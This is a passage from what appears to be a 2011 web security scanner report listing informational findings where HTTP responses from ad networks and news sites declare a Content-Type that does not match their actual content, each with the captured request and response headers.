Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:28 GMT
Server: Barista/1.1
Connection: Keep-Alive
Content-Type: text/html
set-cookie: vi_1.021=130494962871114765000106049048049; domain=.pulse360.com; path=/; expires=Tue, 08-May-2012 14:00:28 GMT
set-cookie: fc_1.2=AXzzx00; domain=.pulse360.com; path=/; expires=Mon, 16-May-2011 14:00:28 GMT
p3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Content-Length: 3662

document.write('<style type="text/css">.p360_listing { cursor: pointer;}</style><!--Ad Markup by Seevast--><div id="p360_ad_unit"><div id="p360_header"><div class="p360_aligner_left"><span id="p360_
...[SNIP]...
25.8. http://event.adxpose.com/event.flow  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fwww.indianasnewscenter.com%2Fnews%2Flocal%2FAt-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html&uid=9ByavNwWFmRBp6h6_40792835&xy=0%2C0&wh=728%2C90&vchannel=382765&cid=Toyota_2011_RAAP&iad=1304949550599-23798237647861244&cookieenabled=1&screenwh=1920%2C1200&adwh=728%2C90&colordepth=16&flash=10.2&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N2724.Centro.com/B5245176.26;sz=728x90;ord=[timestamp]?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E6395C0819D24DF51059D75784832A19; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 106
Date: Mon, 09 May 2011 13:59:11 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("9ByavNwWFmRBp6h6_40792835");
25.9. http://imp.fetchback.com/serve/fb/adtag.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /serve/fb/adtag.js?tid=59534&type=lead&clicktrack=http://optimized-by.rubiconproject.com/t/7858/13549/26630-2.3200913.3219970?url= HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uat=1_1304506950; cmp=1_1304903354_13521:0_11051:0_13981:208292_13479:208292_15758:367625_12704:367625_4895:795810_10164:1160086_10638:1160086_10640:1160086_10641:1160086_1437:1160086_1660:1723682; sit=1_1304903354_3006:489:0_3455:208292:208292_2988:430572:396401_3801:543015:542595_1714:827548:795810_3306:1055174:367625_719:1160913:1160086_2451:1211782:1206682_3236:1369745:1369627_782:1724031:1723682; bpd=1_1304903354_1ZunS:78_1ZCU5:4QUb; apd=1_1304903354_1ZunS:6O; afl=1_1304903354; cre=1_1304949669_29807:59535:1:0_29802:59536:1:588698_29805:59534:1:589359; uid=1_1304949669_1303179323923:6792170478871670; kwd=1_1304949669_12936:254607_11317:1206401_11717:1206401_11718:1206401_11719:1206401; scg=1_1304949669; ppd=1_1304949669

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:12 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1304949672_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 07-May-2016 14:01:12 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 09 May 2011 14:01:12 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 294

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=59534&type=lead&clicktrack=http://optimized-by.rubiconproject.com/t/7858/13549/26630-2.3200913.3219970?url=' width='728' heigh
...[SNIP]...
25.10. http://l.apture.com/v3/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://l.apture.com
Path:   /v3/

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /v3/?1=%7B%22isTMMEnabled%22%3A1%2C%22fullBarEnabled%22%3Afalse%2C%22numLinks%22%3A2%2C%22numTmmLinks%22%3A0%2C%22socialLinkCount%22%3A0%2C%22socialLinkStatus%22%3A207%2C%22abTestLinkCountsEnabledSide%22%3A%22B%22%2C%22abTestLinkStylesSide%22%3Anull%2C%22abTestLinkCountStyleSide%22%3Anull%2C%22abTestLinkCursorStyleSide%22%3Anull%2C%22type%22%3A1131%2C%22siteId%22%3A206082%2C%22visitId%22%3A24456114740677%2C%22pageId%22%3A306599076%7D&AC=QuDxqe1K4l HTTP/1.1
Host: l.apture.com
Proxy-Connection: keep-alive
Referer: http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html
Origin: http://www.indianasnewscenter.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST
Access-Control-Max-Age: 604800
Content-Length: 2
Date: Mon, 09 May 2011 13:59:13 GMT
Connection: close

{}
25.11. http://mediacdn.disqus.com/1304703476/fonts/disqus-webfont.woff  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://mediacdn.disqus.com
Path:   /1304703476/fonts/disqus-webfont.woff

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /1304703476/fonts/disqus-webfont.woff HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-487374334-1303349183888; sessionid=5439c19bf65868637b6d94bd5708f992; __utmz=113869458.1304526991.8.8.utmcsr=news.techworld.com|utmccn=(referral)|utmcmd=referral|utmcct=/personal-tech/3277379/x-factor-contestants-warned-after-250000-data-breach/; __utma=113869458.1602204697.1303349184.1304359650.1304526991.8

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Sat, 07 May 2011 00:12:21 GMT
P3P: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Access-Control-Allow-Origin: *
Content-Type: text/plain
Vary: Accept-Encoding
Content-Length: 5304
X-Varnish: 2646202842 2627851889
Cache-Control: max-age=2543833
Expires: Wed, 08 Jun 2011 00:38:41 GMT
Date: Mon, 09 May 2011 14:01:28 GMT
Connection: close

wOFF...............`........................FFTM...l........Z.V.GDEF........... .Y..OS/2.......E...`t.f.cmap................cvt .......6...6 ...fpgm...........e../.gasp................glyf...........p
...[SNIP]...
25.12. http://mediaforce.sitescout.netdna-cdn.com/ad150-c157549.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://mediaforce.sitescout.netdna-cdn.com
Path:   /ad150-c157549.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /ad150-c157549.jpg HTTP/1.1
Host: mediaforce.sitescout.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://mf.sitescout.com/disp?pid=0C66F16&cm=http%3A%2F%2Fib.adnxs.com%2Fclick%2F6UMX1LfMyT_pQxfUt8zJPwAAACAEVvI_6UMX1LfMyT_pQxfUt8zJP2gr4_HSxA8NSsYda6b2ziWm88dNAAAAAAc4BgBmAQAAZgEAAAIAAACj0gIA8WoAAAEAAABVU0QAVVNEANgCWgD-AQAAQg8AAQMCAAUAAAAAcCffIAAAAAA.%2Fcnd%3D%21oSCxOQjC6AIQo6ULGAAg8dUBKAAx6kMX1LfMyT9CEwgAEAAYACABKP7__________wFCCwiCOxAAGAAgAigBQgsIgzsQABgAIAIoAUIOCMg-EPi6AhihEyACKAVCCwitZBAAGAAgAigBSANQAFj-A2AEaOYC%2Freferrer%3Dhttp%253A%252F%252Fwww.thevine.com.au%2Fclickenc%3D&rand=97302867
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-827949149-1303243841013

Response

HTTP/1.1 200 OK
Server: nginx/0.8.36
Date: Mon, 09 May 2011 14:05:58 GMT
Content-Type: image/jpeg
Connection: keep-alive
ETag: W/"7503-1300811120000"
Last-Modified: Tue, 22 Mar 2011 16:25:20 GMT
Content-Length: 7503
X-Cache: HIT
Accept-Ranges: bytes

......JFIF.....`.`......Exif..II*..............C....................................................................C.......................................................................K.d.."......
...[SNIP]...
25.13. http://pglb.buzzfed.com/124044/2cda0cc53888bd4bde08b06faa4b2d81  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://pglb.buzzfed.com
Path:   /124044/2cda0cc53888bd4bde08b06faa4b2d81

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /124044/2cda0cc53888bd4bde08b06faa4b2d81?callback=BF_PARTNER.gate_response&cb=3766 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 38
Cache-Control: max-age=466826
Expires: Sat, 14 May 2011 23:47:25 GMT
Date: Mon, 09 May 2011 14:06:59 GMT
Connection: close

BF_PARTNER.gate_response(1304801415);
25.14. http://wd.sharethis.com/api/getCount2.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://wd.sharethis.com
Path:   /api/getCount2.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /api/getCount2.php?cb=stButtons.processCB&url=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story HTTP/1.1
Host: wd.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:18 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 246

stButtons.processCB({"url":"http:\/\/www.orlandosentinel.com\/business\/os-cfb-cover-casey-tv-20110509%2C0%2C6839926.story","email":9,"total":9,"ourl":"http:\/\/www.orlandosentinel.com\/business\/os-c
...[SNIP]...
25.15. http://www.burstnet.com/cgi-bin/ads/ad20731a.cgi/v=2.3S/sz=300x250A/NZ/23755/NF/RETURN-CODE/JS/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.burstnet.com
Path:   /cgi-bin/ads/ad20731a.cgi/v=2.3S/sz=300x250A/NZ/23755/NF/RETURN-CODE/JS/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /cgi-bin/ads/ad20731a.cgi/v=2.3S/sz=300x250A/NZ/23755/NF/RETURN-CODE/JS/ HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 56Q8=3qCOBQmN0yUv6WrF--lZoc3dRfuweNq9qe4Bp0O5v0HfEOi0vh6R2kg

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Ad-Reach: Burst!Media
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:59 GMT
Connection: close
Set-Cookie: /BC3=.P_d.; path=/
Set-Cookie: /SO=:201:; path=/
Set-Cookie: /PC=0; path=/; expires=Mon, 16-May-2011 14:00:59 GMT
Set-Cookie: /SC=0-2vc.1; path=/
Content-Length: 1393


document.write('<IFR'+'AME SRC="http://ad.doubleclick.net/adi/N3671.burst/B5229711.3;sz=300x250;pc=[TPAS_ID];click=http://www.burstnet.com/ads/ad20731a-map.cgi/BCPG182030.266877.318088/VTS=2iU9W.LI
...[SNIP]...
25.16. http://www.ccnow.com/cgi-local/cart.cgi  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ccnow.com
Path:   /cgi-local/cart.cgi

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /cgi-local/cart.cgi?asmakit_shopcart_http://asthmatickitty.com/closefancybox.php HTTP/1.1
Host: www.ccnow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:12:24 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Content-Type: text/html
Content-Length: 144

<br><center><table border=1 cellspacing=0 cellpadding=10><tr align=center><td>Server is busy; please try again later.</td></tr></table></center>
25.17. http://www.ccnow.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ccnow.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.ccnow.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB7568A8E92F8CE5F45B4467139B51A38206; oudelay=1304949962

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:37 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Last-Modified: Thu, 05 May 2011 18:01:55 GMT
ETag: "2fe-4dc2e613"
Accept-Ranges: bytes
Content-Length: 766
Content-Type: text/plain

...... ..............(... ...@..................................................................................................................................................DDDDDDDDDDDD...........
...[SNIP]...
25.18. http://www.ccnow.com/images/cart/ccnowcart_gray.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ccnow.com
Path:   /images/cart/ccnowcart_gray.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/cart/ccnowcart_gray.jpg HTTP/1.1
Host: www.ccnow.com
Proxy-Connection: keep-alive
Referer: http://www.ccnow.com/cgi-local/sc_cart.cgi?8147444662139294
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB7568A8E92F8CE5F45B4467139B51A38206; oudelay=1304949962

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:06:06 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Last-Modified: Thu, 05 May 2011 18:01:59 GMT
ETag: "523-4dc2e617"
Accept-Ranges: bytes
Content-Length: 1315
Content-Type: image/jpeg

GIF89a.&....ZWX.........1-....vstLIJ.................?;<hef......@..... {.0..`......q.p...........P...h.#. ...........................................................................................
...[SNIP]...
25.19. https://www.ccnow.com/cgi-local/cart.cgi  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.ccnow.com
Path:   /cgi-local/cart.cgi

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /cgi-local/cart.cgi?asmakit_AKR213_http://asthmatickitty.com/closefancybox.php HTTP/1.1
Host: www.ccnow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1304949980.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1027269073.1304949980.1304949980.1304949980.1; __utmc=1; __utmb=1.5.10.1304949980; oudelay=1304950305; ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB75444E983624DD85F34467139B51A38206;

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:12:24 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Connection: close
Content-Type: text/html
Content-Length: 144

<br><center><table border=1 cellspacing=0 cellpadding=10><tr align=center><td>Server is busy; please try again later.</td></tr></table></center>
25.20. https://www.ccnow.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.ccnow.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.ccnow.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB7568A8E92F8CE5F45B4467139B51A38206; oudelay=1304949975; ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB75444E983624DD85F34467139B51A38206; __utmz=1.1304949980.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1027269073.1304949980.1304949980.1304949980.1; __utmc=1; __utmb=1.1.10.1304949980

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:47 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Last-Modified: Thu, 05 May 2011 18:01:55 GMT
ETag: "2fe-4dc2e613"
Accept-Ranges: bytes
Content-Length: 766
Keep-Alive: timeout=15, max=150
Connection: Keep-Alive
Content-Type: text/plain

...... ..............(... ...@..................................................................................................................................................DDDDDDDDDDDD...........
...[SNIP]...
25.21. http://www.clashmusic.com/sites/all/themes/clash/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.clashmusic.com
Path:   /sites/all/themes/clash/favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /sites/all/themes/clash/favicon.ico HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5079a7bd09304b581fb1d164353615c5=h78ot6e3amth8f4pu158nlhcb2; _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.1.10.1304949660; __qca=P0-2063829282-1304949659904

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:03:59 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Mon, 05 Jan 2009 17:25:52 GMT
ETag: "64c4e7-3aee-951de800"
Accept-Ranges: bytes
Content-Length: 15086
Cache-Control: max-age=1209600
Expires: Mon, 23 May 2011 14:03:59 GMT
Vary: User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

......00.... ..%..6... .... ......%........ .h....6..(...0...`..... ......$..........................................i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i...i.
...[SNIP]...
25.22. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /extern/login_status.php?api_key=MY%20APP%20ID&app_id=MY%20APP%20ID&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df16a1716f4%26origin%3Dhttp%253A%252F%252Fwww.floridatoday.com%252Ff6594b49c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df319039ca%26origin%3Dhttp%253A%252F%252Fwww.floridatoday.com%252Ff6594b49c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1358fe16c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1efb99044%26origin%3Dhttp%253A%252F%252Fwww.floridatoday.com%252Ff6594b49c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1358fe16c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df381179ac%26origin%3Dhttp%253A%252F%252Fwww.floridatoday.com%252Ff6594b49c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1358fe16c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df48d55258%26origin%3Dhttp%253A%252F%252Fwww.floridatoday.com%252Ff6594b49c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1358fe16c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.112.112
X-Cnection: close
Date: Mon, 09 May 2011 13:59:33 GMT
Content-Length: 22

Invalid Application ID
25.23. http://www.floridatoday.com/odygel/lib/legacy/GDN/UAWidgets/LoggedOut.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.floridatoday.com
Path:   /odygel/lib/legacy/GDN/UAWidgets/LoggedOut.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /odygel/lib/legacy/GDN/UAWidgets/LoggedOut.js HTTP/1.1
Host: www.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs=D08734_70008|D08734_72078; GCIONSN=AAAAOn52dzoxfnVidDox; GCIONPN=AAAAOn5zZWdtZW50czpEMDg3MzRfNzAwMDh8RDA4NzM0XzcyMDc4

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Mon, 09 Aug 2010 17:30:28 GMT
Accept-Ranges: bytes
ETag: "092ec8ee837cb1:0"
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:45 GMT
Connection: close
Content-Length: 700

/*
******************************************************************************
File: LoggedOut.js
Copyright: Copyright (c) 2008, Gannett Inc. All rights reserved.
*********************
...[SNIP]...
25.24. http://www.nme.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nme.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.nme.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
